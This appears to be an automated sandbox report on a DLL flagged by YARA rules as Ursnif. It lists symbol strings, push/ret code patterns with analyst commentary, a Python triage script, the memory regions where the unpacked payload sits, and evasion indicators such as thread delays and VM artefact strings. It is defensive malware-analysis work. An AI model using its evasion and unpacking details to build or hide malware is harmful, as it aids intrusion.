The .pdb names that follow were all recovered from the memory of WerFault.exe (process 7). They are symbol-file names of system modules loaded during crash reporting and say nothing about the sample. Entries with a stray trailing character (advapi32.pdbl, msvcp_win.pdbk, version.pdb` and the like) are the same strings with one extra byte picked up by the string scanner, not distinct files.
Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000007.00000003.261009852.0000000004A6B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: advapi32.pdbl source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: shell32.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: msvcp_win.pdbk source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: version.pdb` source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wimm32.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mpr.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: setupapi.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: shcore.pdbk source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: profapi.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: winspool.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: shell32.pdbk source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: sechost.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: propsys.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: oleaut32.pdbv source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: powrprof.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ole32.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: version.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wsspicli.pdbj source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: comctl32v582.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: powrprof.pdbr source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rundll32.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: sfc.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wuser32.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: comctl32v582.pdbg source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Every `push <imm>; ret` entry below pushes an address exactly 8 bytes past the reported ret, i.e. a return into the same function a few bytes further on. Read together with the `push ecx; mov dword ptr [esp], reg` entries (the compiler's idiom for spilling a register argument into a fresh stack slot) and the Borland\Delphi\Locales query above, these are the Delphi try/finally epilogue shape (push @exit; finally code; ret) and Delphi prologues rather than control-flow hiding. The one entry that deserves a look is the indirect `push dword ptr [0076FF08h]; ret` at 0_2_0076B448, which transfers control through a pointer in memory.
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0076B448 push dword ptr [0076FF08h]; ret 0_2_0076BDEF
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_007080C0 push ecx; mov dword ptr [esp], ecx 0_2_007080C5
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0070E154 push 0070E180h; ret 0_2_0070E178
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0071611C push ecx; mov dword ptr [esp], edx 0_2_00716121
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072A1E4 push 0072A23Dh; ret 0_2_0072A235
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_007061A2 push 007061D0h; ret 0_2_007061C8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_007061A4 push 007061D0h; ret 0_2_007061C8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0071627C push ecx; mov dword ptr [esp], edx 0_2_00716281
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0071E254 push 0071E280h; ret 0_2_0071E278
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00716238 push ecx; mov dword ptr [esp], edx 0_2_0071623D
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0070621C push 00706248h; ret 0_2_00706240
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_007182BC push ecx; mov dword ptr [esp], ecx 0_2_007182C1
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00714558 push 007145A5h; ret 0_2_0071459D
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072C64C push 0072C6C1h; ret 0_2_0072C6B9
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00714610 push 0071463Ch; ret 0_2_00714634
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072C6C4 push 0072C71Dh; ret 0_2_0072C715
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072A85C push 0072A89Fh; ret 0_2_0072A897
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072A8D4 push 0072A900h; ret 0_2_0072A8F8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0071C8C0 push ecx; mov dword ptr [esp], edx 0_2_0071C8C2
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072A90C push 0072A944h; ret 0_2_0072A93C
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072A9A0 push 0072A9CCh; ret 0_2_0072A9C4
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072AA70 push 0072AAA3h; ret 0_2_0072AA9B
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072AAD0 push 0072AAFCh; ret 0_2_0072AAF4
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00728AD4 push 00728B12h; ret 0_2_00728B0A
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00728B54 push 00728B8Ch; ret 0_2_00728B84
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072AB20 push 0072AB63h; ret 0_2_0072AB5B
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00728B1C push 00728B48h; ret 0_2_00728B40
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072ABEC push 0072AC38h; ret 0_2_0072AC30
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072AB88 push 0072ABCBh; ret 0_2_0072ABC3
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072AC44 push 0072AC8Fh; ret 0_2_0072AC87
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00706CD8 push ecx; mov dword ptr [esp], eax 0_2_00706CD9
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072921C CreatePopupMenu,MITGetCursorUpdateHandle,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetDebugErrorLevel,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,DialogBoxParamW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,DialogBoxIndirectParamW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,MITUpdateInputGlobals, 0_2_0072921C
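An added example, not code from the report: it parses the push/ret findings of this section (copied verbatim into the script), separates `push <imm>; ret` entries whose target lies a few bytes past the ret from indirect `push [mem]; ret` entries, and counts the `push ecx; mov [esp], reg` prologues, leaving a short review list instead of thirty-one undifferentiated hits. The 16-byte threshold for calling a target "local" is an assumption chosen for triage.

```python
import re
from collections import Counter

# Constructed input: the 31 push/ret findings of this section, copied verbatim from the report.
REPORT_LINES = [l.strip() for l in r"""
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0076B448 push dword ptr [0076FF08h]; ret 0_2_0076BDEF
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_007080C0 push ecx; mov dword ptr [esp], ecx 0_2_007080C5
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0070E154 push 0070E180h; ret 0_2_0070E178
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0071611C push ecx; mov dword ptr [esp], edx 0_2_00716121
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072A1E4 push 0072A23Dh; ret 0_2_0072A235
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_007061A2 push 007061D0h; ret 0_2_007061C8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_007061A4 push 007061D0h; ret 0_2_007061C8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0071627C push ecx; mov dword ptr [esp], edx 0_2_00716281
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0071E254 push 0071E280h; ret 0_2_0071E278
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00716238 push ecx; mov dword ptr [esp], edx 0_2_0071623D
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0070621C push 00706248h; ret 0_2_00706240
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_007182BC push ecx; mov dword ptr [esp], ecx 0_2_007182C1
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00714558 push 007145A5h; ret 0_2_0071459D
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072C64C push 0072C6C1h; ret 0_2_0072C6B9
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00714610 push 0071463Ch; ret 0_2_00714634
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072C6C4 push 0072C71Dh; ret 0_2_0072C715
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072A85C push 0072A89Fh; ret 0_2_0072A897
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072A8D4 push 0072A900h; ret 0_2_0072A8F8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0071C8C0 push ecx; mov dword ptr [esp], edx 0_2_0071C8C2
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072A90C push 0072A944h; ret 0_2_0072A93C
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072A9A0 push 0072A9CCh; ret 0_2_0072A9C4
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072AA70 push 0072AAA3h; ret 0_2_0072AA9B
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072AAD0 push 0072AAFCh; ret 0_2_0072AAF4
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00728AD4 push 00728B12h; ret 0_2_00728B0A
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00728B54 push 00728B8Ch; ret 0_2_00728B84
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072AB20 push 0072AB63h; ret 0_2_0072AB5B
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00728B1C push 00728B48h; ret 0_2_00728B40
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072ABEC push 0072AC38h; ret 0_2_0072AC30
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072AB88 push 0072ABCBh; ret 0_2_0072ABC3
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072AC44 push 0072AC8Fh; ret 0_2_0072AC87
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00706CD8 push ecx; mov dword ptr [esp], eax 0_2_00706CD9
""".strip().splitlines()]

# A report line is "<function start> <instruction pattern> <address where the pattern was seen>".
FUNC_RE = re.compile(r"Code function: \d+_\d+_(?P<func>[0-9A-F]{8}) (?P<pattern>.+?) \d+_\d+_(?P<at>[0-9A-F]{8})$")
PUSH_IMM_RET = re.compile(r"^push (?P<target>[0-9A-F]{8})h; ret$")
PUSH_MEM_RET = re.compile(r"^push dword ptr \[(?P<ptr>[0-9A-F]{8})h\]; ret$")
SLOT_PROLOGUE = re.compile(r"^push ecx; mov dword ptr \[esp\], (?P<reg>e[a-d]x)$")

# Assumption for triage: a pushed target at most this far past the ret is a local epilogue
# (the Delphi try/finally shape: push @exit; <finally code>; ret), not control-flow hiding.
LOCAL_EPILOGUE_MAX = 16


def classify(line):
    """Return (kind, detail) for one report line, or None if it is not a code-function finding."""
    m = FUNC_RE.search(line)
    if not m:
        return None
    pattern, at = m["pattern"], int(m["at"], 16)
    if (p := PUSH_IMM_RET.match(pattern)):
        delta = int(p["target"], 16) - at  # signed distance from the ret to the pushed target
        kind = "local_epilogue" if 0 < delta <= LOCAL_EPILOGUE_MAX else "push_ret_jump"
        return kind, delta
    if (p := PUSH_MEM_RET.match(pattern)):
        # push [mem]; ret is an indirect jump through a pointer: resolve it in the disassembler.
        return "indirect_push_ret", int(p["ptr"], 16)
    if (p := SLOT_PROLOGUE.match(pattern)):
        # push ecx; mov [esp], reg: the Delphi prologue idiom for spilling a register argument.
        return "stack_slot_prologue", p["reg"]
    return "other", pattern


def triage(lines):
    """Count each category and collect the findings that still need a human look."""
    counts, review = Counter(), []
    for line in lines:
        result = classify(line)
        if result is None:
            continue
        kind, detail = result
        counts[kind] += 1
        if kind in ("push_ret_jump", "indirect_push_ret"):
            review.append((kind, detail))
    return counts, review


if __name__ == "__main__":
    counts, review = triage(REPORT_LINES)
    print(dict(counts))  # {'indirect_push_ret': 1, 'stack_slot_prologue': 7, 'local_epilogue': 23}
    print(review)        # [('indirect_push_ret', 7798536)]
```

Run against this section the script leaves a single item to review, the pointer at 0x0076FF08; a `push <imm>; ret` whose target lands in another region or far from the ret would be classified as `push_ret_jump` and surface alongside it.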

Hooking and other Techniques for Hiding and Protection

The Ursnif rule matches listed here are all on memory dumps (.sdmp), on the memory of the loaddll32.exe process (PID 988) and on unpacked PE regions carved from both processes; none is on hFGZpat9Mf.dll itself. The matched regions (0x890000 and 0x9E0000 in loaddll32.exe; 0xED0000, 0xEE0000 and 0x1080000 in rundll32.exe) are the unpacked payload, and they, not the file on disk, are what to dump for configuration extraction.
Source: Yara match File source: 00000000.00000003.481994883.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.302599061.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.302425761.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.302331542.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.302218181.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.302044791.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.301848056.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.302504649.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.301661083.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.777721996.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 988, type: MEMORYSTR
Source: Yara match File source: 3.2.rundll32.exe.ee0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.rundll32.exe.ee0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.1080000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.rundll32.exe.1080000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.9e0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.rundll32.exe.1080000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.rundll32.exe.1080000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.rundll32.exe.ed0184.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.ed0184.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.9e0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.2500000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.1080000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.890184.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.rundll32.exe.1080000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.rundll32.exe.ee0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.2a094a0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.8a0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.2a094a0.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.rundll32.exe.ed0184.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.777601117.0000000002A09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.253570198.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.315781287.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.253536439.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.315692460.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.776718826.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.776603802.0000000000890000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.254119232.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.253543214.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.776641923.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.254127070.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.254160040.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.315717603.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00721174 IsIconic, 0_2_00721174
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00E37170 IsIconic,GetWindowPlacement,GetWindowRect, 3_2_00E37170
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00E5D24C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient, 3_2_00E5D24C
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072921C CreatePopupMenu,MITGetCursorUpdateHandle,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetDebugErrorLevel,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,DialogBoxParamW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,DialogBoxIndirectParamW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,MITUpdateInputGlobals, 0_2_0072921C
Source: C:\Windows\SysWOW64\WerFault.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\SysWOW64\rundll32.exe Evasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleep
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072C54C 0_2_0072C54C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00E3C54C 3_2_00E3C54C
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
Source: C:\Windows\System32\loaddll32.exe Window / User API: threadDelayed 1014
Source: C:\Windows\System32\loaddll32.exe Window / User API: threadDelayed 432
Source: C:\Windows\System32\loaddll32.exe Window / User API: threadDelayed 1247
Source: C:\Windows\System32\loaddll32.exe Window / User API: threadDelayed 805
Source: C:\Windows\System32\loaddll32.exe Window / User API: threadDelayed 867
Source: C:\Windows\System32\loaddll32.exe Window / User API: threadDelayed 964
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072C54C 0_2_0072C54C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00E3C54C 3_2_00E3C54C
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072165C GetSystemInfo, 0_2_0072165C
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_007053C4 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 0_2_007053C4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00E153C4 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 3_2_00E153C4
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node
Source: Amcache.hve.7.dr Binary or memory string: VMware
Source: Amcache.hve.7.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.7.dr Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.7.dr Binary or memory string: VMware Virtual USB Mouse
Source: loaddll32.exe, 00000000.00000002.777216026.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.750161784.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.772918664.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.438919060.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWve MAC Layer LightWeight Filter-0000
Source: Amcache.hve.7.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.7.dr Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: Amcache.hve.7.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.7.dr Binary or memory string: VMware7,1
Source: Amcache.hve.7.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.7.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.7.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
